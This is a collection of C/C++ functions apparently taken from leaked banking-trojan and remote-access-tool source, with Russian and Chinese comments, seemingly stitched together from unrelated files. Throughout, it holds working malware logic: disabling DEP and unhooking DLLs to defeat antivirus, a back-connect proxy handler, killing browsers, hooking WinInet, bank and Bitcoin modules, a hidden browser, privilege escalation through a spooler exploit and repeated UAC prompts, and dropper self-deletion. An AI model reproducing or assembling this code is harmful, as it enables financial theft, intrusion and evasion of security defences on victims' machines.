DWORD WINAPI AvFuckThread( LPVOID lpData )
{
DisableDEP();
UnhookDlls();
HANDLE hBlockAV = StartThread( AvBlockThread, NULL );
HANDLE hMiniAV = StartThread( MiniAVThread, NULL );
pWaitForSingleObject( hBlockAV, INFINITE );
pWaitForSingleObject( hMiniAV, INFINITE );
pExitProcess( 1 );
return 0;
}
void DisconnBid( USHORT uBid )
{
pWaitForSingleObject( hThreadMutex, INFINITE );
int k = FindConn( uBid );
if ( k != -1 )
{
ThreadConnection Conn = Connections[ k ];
Connections[ k ].thread_s = INVALID_SOCKET;
if ( Conn.thread_s != INVALID_SOCKET )
{
pshutdown( Conn.thread_s, FD_READ );
pshutdown( Conn.thread_s, SD_SEND );
pclosesocket( Conn.thread_s );
}
dwConnections--;
if ( dwConnections )
{
Connections[ k ] = Connections[ dwConnections ];
}
}
pReleaseMutex( hThreadMutex );
}
void ManageNewConnection( SOCKET Socket, ULONG uIP, USHORT uCid, USHORT uPort)
{
pWaitForSingleObject( hThreadMutex, INFINITE );
if ( dwConnections < MAX_CONN )
{
Connections[ dwConnections ].thread_s = INVALID_SOCKET;
Connections[ dwConnections ].s = Socket;
Connections[ dwConnections ].ip = uIP;
Connections[ dwConnections ].port = uPort;
Connections[ dwConnections ].cid = uCid;
Connections[ dwConnections ].bid = (USHORT)dwBid + 1;
in_addr in;
in.S_un.S_addr = uIP;
Connections[ dwConnections ].thread_s = NetConnect( (char*)pinet_ntoa( in ), uPort );
dwBid++;
DWORD ThreadId = 0;
dwConnections++;
Connections[ dwConnections - 1 ].hThread = pCreateThread( NULL, 0, ConnectionThread, (void*)Connections[ dwConnections - 1 ].bid, 0, &ThreadId );
}
pReleaseMutex( hThreadMutex );
}
bool TryToCatchHostLevelInstanceMutex(const char* MutexPrefix)
{
CHAR mutex_name[200];
m_memset(mutex_name, 0, sizeof(mutex_name));
PCHAR machine_id = MakeMachineID();
m_lstrcat(mutex_name, "Global\\");
m_lstrcat(mutex_name, MutexPrefix);
m_lstrcat(mutex_name, machine_id);
STR::Free(machine_id);
LDRDBG("TryToCatchHostLevelInstanceMutex", "Mutex name '%s'.", mutex_name);
SECURITY_ATTRIBUTES sa;
SECURITY_DESCRIPTOR sd;
pInitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
pSetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);
sa.nLength = sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = &sd;
sa.bInheritHandle = FALSE;
HANDLE mutex_handle = (HANDLE)pCreateMutexA(&sa, FALSE, mutex_name);
if (mutex_handle == NULL) return false;
// Catch ownership of mutex and never release
DWORD wait_result = (DWORD)pWaitForSingleObject(mutex_handle, 1000);
if (wait_result == WAIT_OBJECT_0) return true;
pCloseHandle(mutex_handle);
return false;
}
DWORD WINAPI HuntThred( LPVOID lpData )
{
//если есть файл на диске,то берём из него строку и запускаем сб
//внутри файла строка 127.0.0.1:5555
if (HunterFileExists())
{
Hunting();
return 0;
}
HANDLE tmp;
while(true)
{
tmp= (HANDLE)pOpenMutexA(MUTEX_ALL_ACCESS,FALSE, (PCHAR)HunterMutexName);
if ((DWORD)pWaitForSingleObject(tmp, INFINITE))
{
if (HunterFileExists())//&&!IsSbStarted()
{
Hunting();
}
pSleep(90);
}
else
{
Hunting();
pCloseHandle(tmp);
FileCreateInFolder(0x001a, (PWCHAR)HunterFileName,NULL,0);
break;
}
}
return 0;
}
VOID WINAPI Hook_ExitProcess(UINT Code)
{
// Попытка завершить процесс, если
// запущен поток загрузки плагина, то дожидаемся его завершения
if (ThreadHandle != NULL)
pWaitForSingleObject(ThreadHandle, INFINITE);
Real_ExitProcess(Code);
}
void CManager::WaitForDialogOpen()
{
char BrmAP30[] = {'W','a','i','t','F','o','r','S','i','n','g','l','e','O','b','j','e','c','t','\0'};
WaitForSingleObjectT pWaitForSingleObject=(WaitForSingleObjectT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP30);
pWaitForSingleObject(m_hEventDlgOpen, INFINITE);
// 必须的Sleep,因为远程窗口从InitDialog中发送COMMAND_NEXT到显示还要一段时间
char FBwWp25[] = {'S','l','e','e','p','\0'};
SleepT pSleep=(SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp25);
pSleep(150);
}
LPBYTE CVideoCap::GetDIB()
{
capGrabFrameNoStop(m_hWndCap);
char CPolQ01[] = {'W','a','i','t','F','o','r','S','i','n','g','l','e','O','b','j','e','c','t','\0'};
WaitForSingleObjectT pWaitForSingleObject=(WaitForSingleObjectT)GetProcAddress(LoadLibrary("KERNEL32.dll"),CPolQ01);
DWORD dwRet = pWaitForSingleObject(m_hCaptureEvent, 3000);
if (dwRet == WAIT_OBJECT_0)
return m_lpDIB;
else
return NULL;
}
SOCKET MyConnect( char *Host, int Port )
{
LPHOSTENT lpHost = (LPHOSTENT)pgethostbyname( (const char*)Host );
if ( lpHost == NULL )
{
return -1;
}
sockaddr_in SockAddr;
SockAddr.sin_family = AF_INET;
SockAddr.sin_addr.s_addr = **(unsigned long**)lpHost->h_addr_list;
SockAddr.sin_port = (USHORT)phtons( (unsigned short)Port );
ConnectionData connData;
connData.SockAddr = SockAddr;
for(int i=0; i<3; i++) {
SOCKET Socket = (SOCKET)psocket( AF_INET, SOCK_STREAM, 0 );
if( Socket == -1 )
return -1;
connData.Socket = Socket;
HANDLE ConnectThreadHandle = (HANDLE)pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ConnectThread, &connData, NULL, 0);
if((long)pWaitForSingleObject(ConnectThreadHandle, 10000) == WAIT_TIMEOUT)
{
if((int)pshutdown(Socket, 2) == SOCKET_ERROR)
{
}
pTerminateThread(ConnectThreadHandle, 1);
}
DWORD exitCode = 0;
BOOL res = (BOOL)pGetExitCodeThread(ConnectThreadHandle, &exitCode);
//wsprintfA(&str[0], "EC:%d", exitCode);
//OutputDebugStringA(&str[0]);
if(res && exitCode == 0)
return Socket;
}
return -1;
}
static bool Exec( DWORD* exitCode, char *msg, ... )
{
bool ret = false;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
if( exitCode ) *exitCode = 0;
va_list mylist;
va_start( mylist, msg );
TMemory buf(1024);
pwvsprintfA( buf.AsStr(), msg, mylist );
va_end(mylist);
ClearStruct(pi);
ClearStruct(si);
si.cb = sizeof(si);
pGetStartupInfoA(&si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = FALSE;
DBG( "CreateProcess(): %s", buf.AsStr() );
if( pCreateProcessA( NULL, buf.AsStr(), NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi) )
{
pWaitForSingleObject( pi.hProcess, INFINITE );
if( exitCode )
pGetExitCodeProcess( pi.hProcess, exitCode );
pCloseHandle(pi.hThread);
pCloseHandle(pi.hProcess);
ret = TRUE;
}
else
DBG( "CreateProcess() ERROR %d", pGetLastError() );
return ret;
}
void KillAllConnections()
{
pWaitForSingleObject( hThreadMutex, INFINITE );
for ( DWORD i = 0; i < dwConnections; i++ )
{
ThreadConnection Conn = Connections[ i ];
pshutdown( Conn.thread_s, FD_READ );
pshutdown( Conn.thread_s, SD_SEND );
pclosesocket( Conn.thread_s );
}
m_memset( &Connections, 0, sizeof( ThreadConnection ) * dwConnections );
dwConnections = 0;
pReleaseMutex( hThreadMutex );
return;
}
void ExplorerStart(PEventData Data)
{
// Создаём глобальный мьютекс, сигнализирующий о запущенном боте
BOT::TryCreateBotInstance();
// Инициализируем скрываемые файлы
InitializeHiddenFiles();
// Записываем текущие настроки в файл.
// Запись осуществится только если записанных настроек нет
BOT::SaveSettings(true, true, true);
// Убиваем все запущенные браузеры
KillAllBrowsers();
#ifdef FakeDllInstallerH
FDI::Execute();
#endif
#ifdef BBSCBankH
CBank::Start();
#endif
#ifdef JAVS_PATCHERH
StartThread(Run_Path, NULL);
#endif
// Хукаем библиотеку WinInet
#ifdef InternetExplorerH
HookInternetExplorer();
#endif
// Запускаем модуль живучести
#ifdef KeepAliveH
KeepAliveCheckProcess(PROCESS_SVCHOST);
#ifdef VideoRecorderH
#ifdef VideoProcessSvchost
KeepAliveCheckProcess(PROCESS_VIDEO);
#endif
#endif
#endif
// Проверяем систему киберплат
#ifdef CyberPlatDLLH
CyberPlatCheckInstalled();
#endif
#ifdef CmdLineH
HookCmdLine();
#endif
#ifdef BOTMONITOR
PIPE::CreateProcessPipe((PCHAR)BotMonitor::ProcessExplorer, true);
#endif
#ifdef BitcoinH
BitcoinRunAfterReboot();
#endif
#ifdef VideoRecorderH
VideoProcess::ConnectToServer( 0, true );
#endif
// Запуск потока скрытого браузера.
// ВАЖНО! Вызов должен вызываться в последнюю очередь
#ifdef StealthBrowserH
HANDLE H = StartThread( RunIeSB/*SellExecute*/, NULL );// запускаем поток отвечающеий за запуск браузера
pWaitForSingleObject(H, INFINITE);
#endif
}
void SessionWork( SOCKET Socket )
{
PCONNECTIONS pConnect = (PCONNECTIONS)MemAlloc( sizeof( PCONNECTIONS ) );
m_memset( pConnect, 0, sizeof( PCONNECTIONS ) );
char *Data = NULL;
while ( 1 )
{
if ( !WaitRecv( Socket, 60*60 ) )
{
break;
}
TPkt tPacket;
if ( !NetRecv( Socket, (char*)&tPacket, sizeof( tPacket ) ) )
{
break;
}
if ( tPacket.QType == 0x63 )
{
if ( tPacket.dwLen != 6 )
{
break;
}
if ( Data )
{
MemFree( Data );
}
Data = (char *)MemAlloc( tPacket.dwLen + 1 );
if ( Data == NULL )
{
break;
}
if ( !NetRecv( Socket, Data, tPacket.dwLen ) )
{
break;
}
ManageNewConnection( Socket, *(ULONG*)Data, (USHORT)tPacket.dwReserved, *(USHORT*)&Data[4] );
}
else if ( tPacket.QType == 0x73 )
{
if ( Data )
{
MemFree( Data );
}
Data = (char *)MemAlloc( tPacket.dwLen + 1 );
if ( Data == NULL )
{
break;
}
if ( !NetRecv( Socket, Data, tPacket.dwLen ) )
{
break;
}
BcDecrypt( Data, tPacket.dwLen );
ThreadConnection Conn;
pWaitForSingleObject( hThreadMutex, INFINITE );
int k = FindConn( (USHORT)tPacket.dwReserved );
if ( k != -1 )
{
Conn = Connections[ k ];
NetSend( Conn.thread_s, Data, tPacket.dwLen );
}
pReleaseMutex( hThreadMutex );
}
else if ( tPacket.QType == 0x77 )
{
DisconnBid( tPacket.dwReserved );
}
else if ( tPacket.QType == 0x64 )
{
pclosesocket(Socket);
KillAllConnections();
pExitThread( 1 );
break;
}
else if ( tPacket.QType == 0x65 )
{
}
else
{
break;
}
}
if ( Data )
{
MemFree( Data );
}
pConnect->dwStatus = 1;
}
bool AsyncDownload( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize )
{
char *Host = NULL;
char *Path = NULL;
int Port = 0;
if ( !ParseUrl( Url, &Host, &Path, &Port ) )
{
return false;
}
PASYNCHTTP pData = (PASYNCHTTP)MemAlloc( sizeof( PASYNCHTTP ) );
if ( !pData )
{
return false;
}
pData->hConnectedEvent = pCreateEventW( NULL, FALSE, FALSE, NULL );
pData->hRequestOpenedEvent = pCreateEventW( NULL, FALSE, FALSE, NULL );
pData->hRequestCompleteEvent = pCreateEventW( NULL, FALSE, FALSE, NULL );
char *UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
pData->hInstance = (HINTERNET)pInternetOpenA( UserAgent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, INTERNET_FLAG_ASYNC );
LPBYTE lpBuf = NULL;
DWORD dwBufSize = 0;
if ( pData->hInstance )
{
if ( pInternetSetStatusCallback( pData->hInstance, (INTERNET_STATUS_CALLBACK)&Callback) != INTERNET_INVALID_STATUS_CALLBACK)
{
pData->dwCurrent = 1;
pData->hConnect = (HINTERNET)pInternetConnectA( pData->hInstance, Host, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, (DWORD_PTR)pData );
if ( !pData->hConnect )
{
if ( pGetLastError() != ERROR_IO_PENDING )
{
return false;
}
pWaitForSingleObject( pData->hConnectedEvent, INFINITE );
}
pData->dwCurrent = 2;
pData->hRequest = (HINTERNET)pHttpOpenRequestA( pData->hConnect, "GET", Path, NULL, NULL, NULL, INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, (DWORD_PTR)pData );
if ( !pData->hRequest )
{
if ( pGetLastError() != ERROR_IO_PENDING )
{
return false;
}
pWaitForSingleObject( pData->hRequestOpenedEvent, INFINITE );
}
if ( !(BOOL)pHttpSendRequestA( pData->hRequest, NULL, 0, NULL, 0 ) )
{
if ( pGetLastError() != ERROR_IO_PENDING )
{
return false;
}
}
pWaitForSingleObject( pData->hRequestCompleteEvent, INFINITE );
LPBYTE pTmpBuf = (LPBYTE)MemAlloc( 4096 );
if ( !pTmpBuf )
{
return false;
}
INTERNET_BUFFERSA ib;
m_memset( &ib, 0, sizeof( INTERNET_BUFFERSA ) );
ib.dwStructSize = sizeof( INTERNET_BUFFERSA );
ib.lpvBuffer = pTmpBuf;
do
{
ib.dwBufferLength = 4096;
if ( !(BOOL)pInternetReadFileExA( pData->hRequest, &ib, 0, 2 ) )
{
if ( pGetLastError() == ERROR_IO_PENDING)
{
pWaitForSingleObject( pData->hRequestCompleteEvent, INFINITE );
}
else
{
return false;
}
}
if ( ib.dwBufferLength )
{
if ( !lpBuf )
{
if ( !( lpBuf = (LPBYTE)MemAlloc( ib.dwBufferLength + 1 ) ) )
{
return false;
}
}
else
{
LPBYTE p = (LPBYTE)MemRealloc( lpBuf, dwBufSize + ib.dwBufferLength + 1 );
if ( !p )
{
return false;
}
lpBuf = p;
}
m_memcpy( lpBuf + dwBufSize, pTmpBuf, ib.dwBufferLength );
dwBufSize += ib.dwBufferLength;
}
else
{
pData->IsDownloaded = true;
}
} while ( !pData->IsDownloaded );
}
}
pInternetCloseHandle( pData->hRequest );
pInternetCloseHandle( pData->hConnect );
pInternetCloseHandle( pData->hInstance );
pCloseHandle( pData->hConnectedEvent );
pCloseHandle( pData->hRequestOpenedEvent );
pCloseHandle( pData->hRequestCompleteEvent );
MemFree( pData );
if ( dwSize )
{
*lpBuffer = lpBuf;
*dwSize = dwBufSize;
return true;
}
return false;
}
DWORD WINAPI ConnectionThread( LPVOID lpData )
{
int bid = (int)lpData;
ThreadConnection Conn;
pWaitForSingleObject( hThreadMutex, INFINITE );
int k = FindConn( bid );
if ( k != -1 )
{
Conn = Connections[ k ];
}
pReleaseMutex(hThreadMutex);
if ( k != -1 )
{
if ( Conn.thread_s != INVALID_SOCKET )
{
pWaitForSingleObject( hThreadMutex, INFINITE );
k = FindConn( bid );
if ( k != -1 )
{
Connections[ k ].thread_s = Conn.thread_s;
}
pReleaseMutex( hThreadMutex );
pWaitForSingleObject( hSockMutex, INFINITE );
SendStatus( Conn.s, bid, Conn.cid, TRUE );
pReleaseMutex( hSockMutex );
char data[1024];
while ( 1 )
{
int r = (int)precv( Conn.thread_s, data, 1024, 0 );
if ( r == 0 || r == SOCKET_ERROR )
{
pWaitForSingleObject( hSockMutex, INFINITE );
TPkt tPacket;
tPacket.dwLen = 0;
tPacket.QType = 0x77;
tPacket.dwReserved = bid;
NetSend( Conn.s, (char*)&tPacket, sizeof( tPacket ) );
pReleaseMutex( hSockMutex );
break;
}
pWaitForSingleObject( hSockMutex, INFINITE );
TPkt tPacket;
tPacket.dwLen = r;
tPacket.QType = 0x73;
tPacket.dwReserved = bid;
NetSend( Conn.s, (char*)&tPacket, sizeof( tPacket ) );
BcDecrypt( data, r );
if ( !NetSend( Conn.s, data, r ) )
{
pReleaseMutex( hSockMutex );
break;
}
pReleaseMutex( hSockMutex );
}
}
else
{
SendStatus( Conn.s, bid, Conn.cid, FALSE );
}
}
DisconnBid( bid );
return 0;
}
void DebugReportCreateConfigReportAndSend()
{
PCHAR MsInfoPath = NULL;
PCHAR MsInfoParam = NULL;
PCHAR ReportPath = NULL;
PCHAR CabPath = NULL;
DebugReportSettings* settings = DebugReportGetSettings();
DBGRPTDBG("DebugReportCreateConfigReportAndSend",
"Started with settings: Enabled='%d' StatPrefix='%s' StatUrl='%s'",
settings->Enabled, settings->StatPrefix, settings->StatUrl
);
if (!settings->Enabled) return;
do
{
// Получаем путь к msinfo32.exe
MsInfoPath = GetPathToMsInfo32();
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetPathToMsInfo32() return '%s;", MsInfoPath);
if (MsInfoPath == NULL) break;
// Временный файл для отчета
ReportPath = File::GetTempNameA();
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetTempNameA() for report file return '%s;", ReportPath);
if (ReportPath == NULL) break;
MsInfoParam = STR::Alloc(2 * MAX_PATH);
if (MsInfoParam == NULL) break;
PROCESS_INFORMATION pi;
STARTUPINFOA si;
m_memset(&si, 0, sizeof(si));
m_memset(&pi, 0, sizeof(pi));
m_memset(MsInfoParam, 0, STR::Length(MsInfoParam));
// Запускаем скрытно
si.cb = sizeof(si);
si.wShowWindow = SW_HIDE;
m_lstrcat(MsInfoParam, " /report \"");
m_lstrcat(MsInfoParam, ReportPath);
m_lstrcat(MsInfoParam, "\"");
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess('%s', '%s')",
MsInfoPath, MsInfoParam);
BOOL process_result = (BOOL)pCreateProcessA(MsInfoPath, MsInfoParam, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess return %d.(ph=0x%X pid=%d)",
process_result, pi.hProcess, pi.dwProcessId);
if (process_result == FALSE) break;
if (pi.hProcess == NULL) break;
if (pi.hProcess != NULL)
{
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "Waiting for msinfo32.");
pWaitForSingleObject(pi.hProcess, INFINITE);
pCloseHandle(pi.hProcess);
}
if (pi.hThread != NULL) pCloseHandle(pi.hThread);
DWORD attributes = (DWORD)pGetFileAttributesA(ReportPath);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "'%s' attibutes 0x%X.",
ReportPath, attributes);
if (attributes == INVALID_FILE_ATTRIBUTES) break;
CabPath = File::GetTempNameA();
HCAB CabHandle = CreateCab(CabPath);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateCab() return 0x%X.",
CabHandle);
if (CabHandle == NULL) break;
AddFileToCab(CabHandle, ReportPath, "sysinfo.txt");
CloseCab(CabHandle);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sending sysinfo report.");
string BotUid = GenerateUidAsString(settings->StatPrefix);
DebugReportSendSysInfo(BotUid.t_str(), settings->StatUrl, CabPath);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sysinfo report sent.");
}
while (false);
if (ReportPath != NULL) pDeleteFileA(ReportPath);
if (CabPath != NULL) pDeleteFileA(CabPath);
if (ReportPath != NULL) STR::Free(ReportPath);
if (CabPath != NULL) STR::Free(CabPath);
if (MsInfoPath != NULL) STR::Free(MsInfoPath);
DebugReportFreeSettings(settings);
DBGRPTDBG("DebugReportCreateConfigReportAndSend", "finished.");
}
// Ф-ция, которая вызывается при инжекте в другие процессы.
// Проверяет свои права и пробует их расширить для
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
//
// Cоздадим отдельный поток для удаления так как дропер может удаляться больше минуты.
//
BOOL bRun = TRUE;
BOOL bRet = FALSE;
BOOL IsUsedExploit = FALSE;
OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};
UnhookDlls();
BuildImport((PVOID)GetImageBase());
PP_DPRINTF(L"ExplorerRoutine: started");
if (! IsUserAdmin() )
{
PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
switch ( TakePrivileges() )
{
case 0:
case 2:
bRun = FALSE;
break;
};
PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
IsUsedExploit = TRUE; // По идее это всегда TRUE
};
if ( bRun )
{
PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
bRet = ExplorerMain();
PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
}
/* Если есть права Админа но мы не юзали сплоеты и инстал не удался, юзаем сплоеты и снова делаем инстал */
if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
{
PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");
IsUsedExploit = TRUE;
switch ( TakePrivileges() )
{
case 0:
case 2:
bRun = FALSE;
break;
};
if ( bRun )
{
PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
bRet = ExplorerMain();
PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
}
};
pGetVersionExA(&OSVer);
/* Выкидываем длл на диск и юзаем сплойт спуллера, только XP */
if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
{
PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");
DWORD DropSize = 0;
PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize);
if ( DropImage && DropSize)
{
PCHAR DropFile = File::GetTempNameA();
File::WriteBufferA(DropFile,DropImage,DropSize);
SpoolerBypass(DropFile);
STR::Free(DropFile);
};
};
/* Запуск много раз копии дропера с прошением повышенных прав. */
if ( bRet == FALSE )
{
PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");
PCHAR tmpexe,dir,file ;
PCHAR tmp_manifest;
PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
if ( NamePrefix )
do
{
tmpexe = File::GetTempNameA();
tmp_manifest = STR::Alloc(MAX_PATH+1);
dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
if ( tmp_manifest && dir && file)
{
STR::Free(tmpexe);
tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
if ( ! tmpexe )
return 0;
m_lstrcpy(tmp_manifest,tmpexe);
m_lstrcat(tmp_manifest,".manifest");
};
if ( tmpexe && tmp_manifest )
if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
{
DWORD dwCode = -1;
SHELLEXECUTEINFOA ExecInfo;
m_lstrcpy(tmp_manifest,tmpexe);
m_lstrcat(tmp_manifest," ");
m_lstrcat(tmp_manifest,ARGV_UAC_RUN);
ExecInfo.cbSize = sizeof(ExecInfo);
ExecInfo.lpFile = tmpexe;
ExecInfo.lpParameters = tmp_manifest;
ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
for ( int i = 0; i < 10; ++i )
{
PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);
if ( pShellExecuteExA(&ExecInfo) == FALSE )
break;
pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);
if ( dwCode == 0 )
{
PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
break;
}
}
};
if ( tmpexe )
STR::Free(tmpexe);
if ( tmp_manifest )
STR::Free(tmp_manifest);
if ( dir )
STR::Free(dir);
if ( file )
STR::Free(file);
}
while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do, цикл пока не появится Файл буткита
if ( NamePrefix )
STR::Free(NamePrefix);
};
/* Если инстал был не удачный снова пробуем вдруг повезет*/
if ( bRet == FALSE)
{
PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
bRet = ExplorerMain();
PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
}
/* Удаляем дропер */
PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
pCloseHandle(StartThread(DeleteDropper,NULL));
if ( dwExplorerSelf )
{
PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
pExitProcess(0);
}
return 0;
}